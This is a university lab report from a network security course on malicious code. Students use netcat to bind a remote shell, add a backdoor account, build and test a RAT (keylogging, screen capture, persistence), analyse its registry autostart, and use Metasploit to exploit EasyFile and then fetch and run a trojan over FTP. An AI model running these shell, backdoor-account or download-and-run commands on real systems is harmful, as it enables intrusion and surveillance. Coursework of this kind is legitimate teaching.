中國人民公安大學
Chinese people’ public security university

網路對抗技術
實驗報告

實驗四
惡意程式碼技術

學生姓名 劉廣宅
年級 2018級
區隊 網安六區
指導教師 高見

資訊科技與網路安全學院
2020年12月3日

實驗任務總綱
2020—2021 學年 第 一 學期
一、實驗目的
1．通過對木馬的練習，使讀者理解和掌握木馬傳播和執行的機制；通過手動刪除木馬，掌握檢查木馬和刪除木馬的技巧，學會防禦木馬的相關知識，加深對木馬的安全防範意識。

2．瞭解並熟悉常用的網路攻擊工具，木馬的基本功能；
3．達到鞏固課程知識和實際應用的目的。
二、實驗要求
1．認真閱讀每個實驗內容，需要截圖的題目，需清晰截圖並對截圖進行標註和說明。
2．文件要求結構清晰，圖文表達準確，標註規範。推理內容客觀、合理、邏輯性強。
3．軟體工具可使用NC、MSF等。
4．實驗結束後，保留電子文件。
三、實驗步驟
1．準備
提前做好實驗準備，實驗前應把詳細瞭解實驗目的、實驗要求和實驗內容，熟悉並準備好實驗用的軟體工具，按照實驗內容和要求提前做好實驗內容的準備。
2．實驗環境
描述實驗所使用的硬體和軟體環境（包括各種軟體工具）；
開機並啟動軟體office2003或2007、瀏覽器、加解密軟體。
3．實驗過程
1）啟動系統和啟動工具軟體環境。
2）用軟體工具實現實驗內容。
4．實驗報告
按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文件嵌入到實驗報告文件中，文件按照規定的書寫格式書寫，表格要有表說圖形要有圖說。

任務一 利用NC控制電腦

NetCat，具有網路軍刀之稱，它小巧精悍且功能強大，說它小巧精悍，是因為他的軟體大小現在已經壓縮到只有十幾KB，而且在功能上絲毫不減。

實驗過程需要兩個同學相互配合完成：

步驟一：

在受害者的機器 （同學A）
輸入下面的命令：
　　nc.exe -l -p port -e cmd.exe 進入監聽模式

步驟二：
　　在攻擊者的機器.（同學B）
輸入下面的命令：
　　nc ip port //連線victim_IP,然後得到一個shell。 （需要截圖）

步驟三：

在shell中，利用net user 使用者名稱 密碼 /add ，新增一個使用者，並在受害者的機器中使用 net user 命令進行驗證。（需要截圖）
 

然後就可以通過dir檢視c盤下的檔案，進行刪除等操作

可以繼續通過命令列做一些事情。

任務二 利用木馬控制電腦
相關工具：
https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg
https://pan.baidu.com/s/1ajmRKsnv5XvFrKWzszDYwQ(備用，另外一個木馬)

實驗過程需要兩個同學配合：

步驟一：

　攻擊者的機器. （同學A）
開啟V2014.exe程式或則star RAT，這兩個木馬功能類似。

步驟二：
　　點選選單欄中的“服務生成”，在彈出的配置服務端中，配置回連IP地址（攻擊者IP）和埠號，並點選“生成”按鈕，生成木馬服務端。

步驟三：

將生成的木馬可執行程式拷貝到受害者的機器，並雙擊執行。

步驟四：

在控制端中檢視木馬上線情況，並對以下功能每個進行測試和截圖。 【部分功能可能會無效，可以不用截圖】

1. 檔案管理，嘗試拷貝檔案

2. 螢幕控制，嘗試獲取桌面
   

3. 鍵盤記錄，嘗試獲取對方擊鍵記錄
   

4. 會話管理，重啟對方機器，檢視是否能自啟動上線

會話管理，解除安裝對方的木馬。

實驗室電腦實驗失敗
任務三 木馬分析
1.將任務二中生成的木馬設定具備自刪除功能和自啟動功能，對其進行分析。回答以下問題（截圖證明）
（推薦使用“火絨劍”工具）
使用火絨劍

1. 該木馬的回連IP是？192.168.31.109
   

2. 該木馬的回連埠是？
   
   2012埠

3. 該木馬自刪除後，會將自身的宿主程式改成什麼名字，並隱藏到系統其它目錄中。
   非常抱歉，實驗中沒能找到。

4. 該木馬依靠什麼方法實現自啟動的，怎麼實現的。
   修改註冊自啟動項
   

任務四 msf攻擊體驗

1. 在主機A上搭建easyfile,安裝檔案為efssetup，請見線上學習平臺。
   

2. 在主機B上安裝metasploitframework，並在安裝目錄中啟動/bin下的msfconsole

安裝metasploitframework

3. 進入msf命令列後使用search命令查詢相關模組，use 載入模組，show options 檢視引數。
   檢視search命令

use載入模組

show options 檢視引數

4.把遠端目標引數rhosts設定為主機A的IP地址,開始攻擊。

5. 進入到meterpreter> 命令列下，說明已經獲取到shell，可以使用sysinfo檢視目標系統的資訊，screenshot截圖。

下面的步驟是進一步控制目標機器，上傳木馬。

1. 在B機器上搭建ftp，設定使用者名稱和密碼。
   

2. 在B機器開啟木馬控制端，生成木馬server.exe，並放置在ftp目錄下。

3. 在meterpreter>命令列下輸入shell ，進入被控機器的shell
   

4. 用被控機器的shell登入B機器的ftp，下載並執行木馬。檢視木馬上線
   

涉及到的ftp命令有：
ftp 192.168.31.100 登入
get server.exe 下載檔案